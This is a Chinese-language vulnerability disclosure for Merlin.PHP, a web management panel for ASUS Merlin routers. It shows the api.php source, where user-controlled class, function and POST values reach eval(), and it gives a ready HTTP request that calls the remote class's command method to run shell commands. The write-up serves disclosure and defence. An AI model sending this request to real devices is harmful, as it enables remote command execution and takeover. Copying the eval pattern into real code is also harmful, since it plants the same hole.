Merlin.php

面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。

github链接:https://github.com/qoli/Merlin.PHP

在api.php中使用了eval函数,其他几个参数可控制导致任意代码执行。
代码如下:

<?php
set_include_path(get_include_path() . PATH_SEPARATOR . 'library/phpseclib');
require_once 'library/MainFunction.php';
require_once 'Net/SSH2.php';
require_once 'library/Requests.php';
require_once 'library/AppFunction.php';
Requests::register_autoloader();

$merlin_php = new merlin_php();

if (!isset($_POST)) {
    $merlin_php -> _export("no input");
    exit;
}

$o = _GET("class",'unknow');
$f = _GET('function','unknow');

if ($o == 'unknow') {
    $merlin_php -> _export("no input");
    exit;
}

if ($f == 'unknow') {
    $merlin_php -> _export("function?!");
    exit;
}

if (!class_exists($o)) {
    $merlin_php -> _export("class is none");
    exit;
}

$c = new $o();

$agrs = implode(',',$_POST);

// echo '$c->'."$f($agrs);";

eval('$j = $c->'."$f($agrs);");

echo json_encode($j);

最后能控制的是 eval('$j = $c->'."$f($agrs);");

$j=是一个变量赋值不用管,主要是后面的 $c->$f($agrs); 这里面的三个参数都可控。
$c是基于$o创建的;
$o是获取的参数class值 ;

下面是关键代码:

$c = new $o();
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
$agrs = implode(',',$_POST);

可以看出$o是一个对象,$c是$o对象的实例化,$f是对象的成员方法,$agrs是post传入的参数,也就是成员方法的参数。

随便找了一个类,AppFunction.php 中的 remote 类,看了下里面有个执行命令的方法 command;

public function command($command = 'whoami')
{
        return $this->ssh->exec($command);
}

构造下面请求:

POST /6/api.php?function=command&class=remote HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

cc='ls'

跟踪执行流程,实际是执行了下面的代码,导致任意代码执行漏洞。

$c = new remote;
$j = $c->command('ls');

github issue:https://github.com/qoli/Merlin.PHP/issues/27